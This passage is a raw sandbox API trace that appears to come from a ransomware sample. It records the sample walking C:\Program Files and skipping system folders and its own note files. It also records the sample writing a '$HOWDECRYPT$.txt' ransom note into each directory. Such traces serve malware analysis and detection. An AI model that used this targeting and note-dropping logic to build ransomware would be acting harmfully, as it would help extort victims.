lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 81 [0096.440] GetProcessHeap () returned 0x2c0000 [0096.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34e9c8 [0096.440] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14d0) returned 0x2c310e0 [0096.440] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0096.440] lstrcmpiW (lpString1="sql90.xsl", lpString2="Windows") returned -1 [0096.440] lstrlenW (lpString="Windows") returned 7 [0096.440] lstrcmpiW (lpString1="sql90.xsl", lpString2="$Recycle.bin") returned 1 [0096.440] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.440] lstrcmpiW (lpString1="sql90.xsl", lpString2="System Volume Information") returned -1 [0096.440] lstrlenW (lpString="System Volume Information") returned 25 [0096.440] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 81 [0096.440] StrStrIW (lpFirst="sql90.xsl", lpSrch=".spyhunter") returned 0x0 [0096.440] lstrcmpW (lpString1="sql90.xsl", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.440] lstrcmpW (lpString1="sql90.xsl", lpString2="_uninstalling_.png") returned 1 [0096.440] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 81 [0096.440] GetProcessHeap () returned 0x2c0000 [0096.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34eab8 [0096.440] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14d8) returned 0x2c310e0 [0096.440] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0096.440] lstrcmpiW (lpString1="Sybase.xsl", lpString2="Windows") returned -1 [0096.440] lstrlenW (lpString="Windows") returned 7 [0096.440] lstrcmpiW (lpString1="Sybase.xsl", lpString2="$Recycle.bin") returned 1 [0096.440] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.441] lstrcmpiW (lpString1="Sybase.xsl", lpString2="System Volume Information") returned -1 [0096.441] lstrlenW (lpString="System Volume Information") returned 25 [0096.441] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 82 [0096.441] StrStrIW (lpFirst="Sybase.xsl", lpSrch=".spyhunter") returned 0x0 [0096.441] lstrcmpW (lpString1="Sybase.xsl", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.441] lstrcmpW (lpString1="Sybase.xsl", lpString2="_uninstalling_.png") returned 1 [0096.441] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 82 [0096.441] GetProcessHeap () returned 0x2c0000 [0096.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34eba8 [0096.441] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e0) returned 0x2c310e0 [0096.441] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0096.441] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0096.442] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\$HOWDECRYPT$.txt") returned 88 [0096.442] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\$HOWDECRYPT$.txt") returned 88 [0096.442] GetProcessHeap () returned 0x2c0000 [0096.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf2) returned 0x35a360 [0096.442] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e8) returned 0x2c310e0 [0096.442] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.442] lstrcmpiW (lpString1="msmdlocal.dll", lpString2="Windows") returned -1 [0096.442] lstrlenW (lpString="Windows") returned 7 [0096.442] lstrcmpiW (lpString1="msmdlocal.dll", lpString2="$Recycle.bin") returned 1 [0096.442] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.442] lstrcmpiW (lpString1="msmdlocal.dll", lpString2="System Volume Information") returned -1 [0096.442] lstrlenW (lpString="System Volume Information") returned 25 [0096.442] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll") returned 74 [0096.442] StrStrIW (lpFirst="msmdlocal.dll", lpSrch=".spyhunter") returned 0x0 [0096.442] lstrcmpW (lpString1="msmdlocal.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.442] lstrcmpW (lpString1="msmdlocal.dll", lpString2="_uninstalling_.png") returned 1 [0096.442] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll") returned 74 [0096.442] GetProcessHeap () returned 0x2c0000 [0096.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x3463a8 [0096.442] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14f0) returned 0x2c310e0 [0096.442] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.442] lstrcmpiW (lpString1="msmgdsrv.dll", lpString2="Windows") returned -1 [0096.442] lstrlenW (lpString="Windows") returned 7 [0096.442] lstrcmpiW (lpString1="msmgdsrv.dll", lpString2="$Recycle.bin") returned 1 [0096.442] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.442] lstrcmpiW (lpString1="msmgdsrv.dll", lpString2="System Volume Information") returned -1 [0096.442] lstrlenW (lpString="System Volume Information") returned 25 [0096.443] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll") returned 73 [0096.443] StrStrIW (lpFirst="msmgdsrv.dll", lpSrch=".spyhunter") returned 0x0 [0096.443] lstrcmpW (lpString1="msmgdsrv.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.443] lstrcmpW (lpString1="msmgdsrv.dll", lpString2="_uninstalling_.png") returned 1 [0096.443] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll") returned 73 [0096.443] GetProcessHeap () returned 0x2c0000 [0096.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x346728 [0096.443] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14f8) returned 0x2c310e0 [0096.443] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.443] lstrcmpiW (lpString1="msolap100.dll", lpString2="Windows") returned -1 [0096.443] lstrlenW (lpString="Windows") returned 7 [0096.443] lstrcmpiW (lpString1="msolap100.dll", lpString2="$Recycle.bin") returned 1 [0096.443] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.443] lstrcmpiW (lpString1="msolap100.dll", lpString2="System Volume Information") returned -1 [0096.443] lstrlenW (lpString="System Volume Information") returned 25 [0096.443] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll") returned 74 [0096.443] StrStrIW (lpFirst="msolap100.dll", lpSrch=".spyhunter") returned 0x0 [0096.443] lstrcmpW (lpString1="msolap100.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.443] lstrcmpW (lpString1="msolap100.dll", lpString2="_uninstalling_.png") returned 1 [0096.443] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll") returned 74 [0096.443] GetProcessHeap () returned 0x2c0000 [0096.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346488 [0096.443] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1500) returned 0x2c310e0 [0096.443] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.443] lstrcmpiW (lpString1="msolui100.dll", lpString2="Windows") returned -1 [0096.443] lstrlenW (lpString="Windows") returned 7 [0096.443] lstrcmpiW (lpString1="msolui100.dll", lpString2="$Recycle.bin") returned 1 [0096.443] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.443] lstrcmpiW (lpString1="msolui100.dll", lpString2="System Volume Information") returned -1 [0096.447] lstrlenW (lpString="System Volume Information") returned 25 [0096.447] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll") returned 74 [0096.447] StrStrIW (lpFirst="msolui100.dll", lpSrch=".spyhunter") returned 0x0 [0096.447] lstrcmpW (lpString1="msolui100.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.447] lstrcmpW (lpString1="msolui100.dll", lpString2="_uninstalling_.png") returned 1 [0096.447] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolui100.dll") returned 74 [0096.447] GetProcessHeap () returned 0x2c0000 [0096.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346648 [0096.447] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1508) returned 0x2c310e0 [0096.447] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0096.447] lstrcmpiW (lpString1="Resources", lpString2="Windows") returned -1 [0096.447] lstrlenW (lpString="Windows") returned 7 [0096.447] lstrcmpiW (lpString1="Resources", lpString2="$Recycle.bin") returned 1 [0096.447] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.447] lstrcmpiW (lpString1="Resources", lpString2="System Volume Information") returned -1 [0096.448] lstrlenW (lpString="System Volume Information") returned 25 [0096.448] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources") returned 70 [0096.448] lstrcmpW (lpString1="Resources", lpString2=".") returned 1 [0096.448] lstrcmpW (lpString1="Resources", lpString2="..") returned 1 [0096.448] GetProcessHeap () returned 0x2c0000 [0096.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0096.448] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\*") returned 72 [0096.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0096.448] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0096.448] lstrlenW (lpString="Windows") returned 7 [0096.448] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0096.448] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.448] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0096.448] lstrlenW (lpString="System Volume Information") returned 25 [0096.448] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\.") returned 72 [0096.448] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.448] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0096.448] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0096.448] lstrlenW (lpString="Windows") returned 7 [0096.448] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0096.448] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.448] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0096.448] lstrlenW (lpString="System Volume Information") returned 25 [0096.448] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\..") returned 73 [0096.449] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.449] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.449] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0096.449] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0096.449] lstrlenW (lpString="Windows") returned 7 [0096.449] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0096.449] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.449] lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0096.449] lstrlenW (lpString="System Volume Information") returned 25 [0096.449] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033") returned 75 [0096.449] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0096.449] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0096.449] GetProcessHeap () returned 0x2c0000 [0096.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c21098 [0096.449] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\*") returned 77 [0096.449] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0096.451] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0096.451] lstrlenW (lpString="Windows") returned 7 [0096.451] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0096.451] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.451] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0096.451] lstrlenW (lpString="System Volume Information") returned 25 [0096.451] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\.") returned 77 [0096.451] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.451] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0096.452] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0096.452] lstrlenW (lpString="Windows") returned 7 [0096.452] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0096.452] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.453] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0096.453] lstrlenW (lpString="System Volume Information") returned 25 [0096.453] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\..") returned 78 [0096.453] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.453] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.453] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0096.453] lstrcmpiW (lpString1="msmdsrv.rll", lpString2="Windows") returned -1 [0096.453] lstrlenW (lpString="Windows") returned 7 [0096.453] lstrcmpiW (lpString1="msmdsrv.rll", lpString2="$Recycle.bin") returned 1 [0096.453] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.453] lstrcmpiW (lpString1="msmdsrv.rll", lpString2="System Volume Information") returned -1 [0096.453] lstrlenW (lpString="System Volume Information") returned 25 [0096.453] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 87 [0096.453] StrStrIW (lpFirst="msmdsrv.rll", lpSrch=".spyhunter") returned 0x0 [0096.453] lstrcmpW (lpString1="msmdsrv.rll", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.453] lstrcmpW (lpString1="msmdsrv.rll", lpString2="_uninstalling_.png") returned 1 [0096.453] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 87 [0096.453] GetProcessHeap () returned 0x2c0000 [0096.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf0) returned 0x355790 [0096.453] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1510) returned 0x2c310e0 [0096.453] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0096.453] lstrcmpiW (lpString1="msolui100.rll", lpString2="Windows") returned -1 [0096.453] lstrlenW (lpString="Windows") returned 7 [0096.454] lstrcmpiW (lpString1="msolui100.rll", lpString2="$Recycle.bin") returned 1 [0096.454] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.454] lstrcmpiW (lpString1="msolui100.rll", lpString2="System Volume Information") returned -1 [0096.454] lstrlenW (lpString="System Volume Information") returned 25 [0096.454] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 89 [0096.454] StrStrIW (lpFirst="msolui100.rll", lpSrch=".spyhunter") returned 0x0 [0096.454] lstrcmpW (lpString1="msolui100.rll", lpString2="$HOWDECRYPT$.txt") returned 1 [0096.454] lstrcmpW (lpString1="msolui100.rll", lpString2="_uninstalling_.png") returned 1 [0096.454] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 89 [0096.454] GetProcessHeap () returned 0x2c0000 [0096.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf4) returned 0x35a460 [0096.454] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1518) returned 0x2c310e0 [0096.454] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0096.454] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0096.454] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\$HOWDECRYPT$.txt") returned 92 [0096.454] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\$HOWDECRYPT$.txt") returned 92 [0096.454] GetProcessHeap () returned 0x2c0000 [0096.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfa) returned 0x381a90 [0096.454] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1520) returned 0x2c310e0 [0096.455] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0096.455] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0096.456] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\$HOWDECRYPT$.txt") returned 87 [0096.456] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\$HOWDECRYPT$.txt") returned 87 [0096.456] GetProcessHeap () returned 0x2c0000 [0096.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf0) returned 0x355698 [0096.456] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1528) returned 0x2c310e0 [0096.456] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0096.456] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0096.456] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\$HOWDECRYPT$.txt") returned 77 [0096.456] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\$HOWDECRYPT$.txt") returned 77 [0096.456] GetProcessHeap () returned 0x2c0000 [0096.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x377998 [0096.457] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1530) returned 0x2c310e0 [0096.457] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0096.458] FindClose (in: hFindFile=0x335f20 | out: hFindFile=0x335f20) returned 1 [0096.458] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\$HOWDECRYPT$.txt") returned 74 [0096.458] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\$HOWDECRYPT$.txt") returned 74 [0096.458] GetProcessHeap () returned 0x2c0000 [0096.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346d48 [0096.458] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1538) returned 0x2c310e0 [0096.458] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0096.458] FindClose (in: hFindFile=0x335ee0 | out: hFindFile=0x335ee0) returned 1 [0096.458] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\$HOWDECRYPT$.txt") returned 65 [0096.458] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\$HOWDECRYPT$.txt") returned 65 [0096.458] GetProcessHeap () returned 0x2c0000 [0096.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358d60 [0096.458] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1540) returned 0x2c310e0 [0096.459] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0096.459] lstrcmpiW (lpString1="Microsoft Office", lpString2="Windows") returned -1 [0096.459] lstrlenW (lpString="Windows") returned 7 [0096.459] lstrcmpiW (lpString1="Microsoft Office", lpString2="$Recycle.bin") returned 1 [0096.459] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.459] lstrcmpiW (lpString1="Microsoft Office", lpString2="System Volume Information") returned -1 [0096.459] lstrlenW (lpString="System Volume Information") returned 25 [0096.459] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office") returned 37 [0096.459] lstrcmpW (lpString1="Microsoft Office", lpString2=".") returned 1 [0096.459] lstrcmpW (lpString1="Microsoft Office", lpString2="..") returned 1 [0096.459] GetProcessHeap () returned 0x2c0000 [0096.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0096.460] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\*") returned 39 [0096.460] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x335ee0 [0096.460] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0096.460] lstrlenW (lpString="Windows") returned 7 [0096.460] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0096.460] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.460] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0096.460] lstrlenW (lpString="System Volume Information") returned 25 [0096.460] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\.") returned 39 [0096.461] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.461] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0096.461] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0096.461] lstrlenW (lpString="Windows") returned 7 [0096.461] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0096.461] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.461] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0096.461] lstrlenW (lpString="System Volume Information") returned 25 [0096.462] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\..") returned 40 [0096.462] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.462] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.462] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0096.462] lstrcmpiW (lpString1="CLIPART", lpString2="Windows") returned -1 [0096.462] lstrlenW (lpString="Windows") returned 7 [0096.462] lstrcmpiW (lpString1="CLIPART", lpString2="$Recycle.bin") returned 1 [0096.462] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.463] lstrcmpiW (lpString1="CLIPART", lpString2="System Volume Information") returned -1 [0096.463] lstrlenW (lpString="System Volume Information") returned 25 [0096.463] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART") returned 45 [0096.463] lstrcmpW (lpString1="CLIPART", lpString2=".") returned 1 [0096.463] lstrcmpW (lpString1="CLIPART", lpString2="..") returned 1 [0096.463] GetProcessHeap () returned 0x2c0000 [0096.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0096.463] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\*") returned 47 [0096.463] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335f20 [0096.477] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0096.477] lstrlenW (lpString="Windows") returned 7 [0096.477] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0096.477] lstrlenW (lpString="$Recycle.bin") returned 12 [0096.477] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0096.477] lstrlenW (lpString="System Volume Information") returned 25 [0096.477] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\.") returned 47 [0096.478] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.478] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0096.478] lstrcmpiW (lpString1="..", lpString2="Windows") 